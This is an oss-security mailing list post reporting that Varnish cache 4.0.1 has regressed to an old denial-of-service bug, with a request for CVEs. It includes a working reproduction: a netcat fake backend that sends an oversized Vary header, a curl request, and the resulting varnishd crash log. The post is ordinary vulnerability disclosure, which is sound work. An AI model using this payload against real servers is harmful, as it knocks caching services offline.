Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Thu, 3 Jul 2014 03:45:03 +0400
From: Solar Designer <solar@...nwall.com>
To: Marek Kroemeke <kroemeke@...il.com>
Cc: oss-security@...ts.openwall.com, Poul-Henning Kamp <phk@....freebsd.dk>
Subject: Re: Varnish - no CVE == bug regression

CC'ing the posting below to Poul-Henning Kamp.

On Wed, Jul 02, 2014 at 05:57:01PM +0100, Marek Kroemeke wrote:
> Hi there,
> 
> 
> Latest version of Varnish cache (4.0.1 https://www.varnish-cache.org/ ) has 
> the same DoS vulnerability that 3.x had (which was subsequently fixed in 
> that branch). 
> 
> 
> Any chance to allocate some CVEs for the below so that this 
> doesn't happen again ?
> 
> 
> http://seclists.org/fulldisclosure/2013/Mar/55
> http://seclists.org/fulldisclosure/2013/Mar/61
> http://seclists.org/fulldisclosure/2013/Mar/63
> http://seclists.org/fulldisclosure/2013/Mar/58
> 
> 
> 
> 
> How to replicate (assuming varnish proxies to port 8100) :
> 
> 
> "HTTP/1.1 200 foo\r\nVary: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n\r\n"  | nc.traditional -l -p8100
> 
> 
> curl http://localhost:6081/
> 
> 
> -- cut --
> Jul  2 18:32:09 localhost varnishd[6145]: Child (21893) Panic message:#012Assert error in http_GetHdr(), cache/cache_http.c line 347:#012  Condition(l == strlen(hdr + 1)) not true.#012thread = (cache-worker)#012ident = Linux,3.2.0-58-generic,x86_64,-smalloc,-smalloc,-hcritbit,epoll#012Backtrace:#012  0x42fdd9: pan_ic+0x1a0#012  0x426267: http_GetHdr+0x5b#012  0x43a951: VRY_Create+0x375#012  0x41c930: vbf_beresp2obj+0x40#012  0x41e766: vbf_fetch_thread+0x1949#012  0x432b7d: Pool_Work_Thread+0x5e8#012  0x4444da: wrk_thread_real+0xfc#012  0x444698: WRK_thread+0x16#012  0x7f21da3cfe9a: /lib/x86_64-linux-gnu/libpthread.so.0(+0x7e9a) [0x7f21da3cfe9a]#012  0x7f21da0fc3fd: /lib/x86_64-linux-gnu/libc.so.6(clone+0x6d) [0x7f21da0fc3fd]#012  busyobj = 0x7f21a4090a90 {#012    ws = 0x7f21a4090b50 {#012      id = "bo",#012      {s,f,r,e} = {0x7f21a4092a70,+456,(nil),+57376},#012    },#012  refcnt = 2#012  retries = 0#012  failed = 0#012  state = 1#012    is_do_stream#012    is_is_gunzip#012    bodystatus = 4 (eof),#012    },#012    http[bereq] = {#012      ws = 0x7f21a4090b50[bo]#012        "GET",#012        "/",#012        "HTTP/1.1",#012        "User-Agent: curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3",#012        "Host: localhost:6081",#012        "Accept: */*",#012        "X-Forwarded-For: 127.0.0.1",#012        "Accept-Encoding: gzip",#012        "X-Varnish: 3",#012    },#012    http[beresp] = {#012      ws = 0x7f21a4090b50[bo]#012        "HTTP/1.1",#012        "200",#012        "foo",#012        "Vary: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",#012        "Date: Wed, 02 Jul 2014 16:32:07 GMT",#012    },#012    ws = 0x7f21a4090cd8 { BAD_MAGIC(0x00000000) },#012    },#012  objcore (FETCH) = 0x7f2198000950 {#012    refcnt = 2#012    flags = 0x2#012    objhead = 0x7f21980009e0#012  }#012  }#012
> -- cut --
> 
> 
> 
> 
> regards,
> AKAT-1
> 22733db72ab3ed94b5f8a1ffcde850251fe6f466
> Marek Kroemeke

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.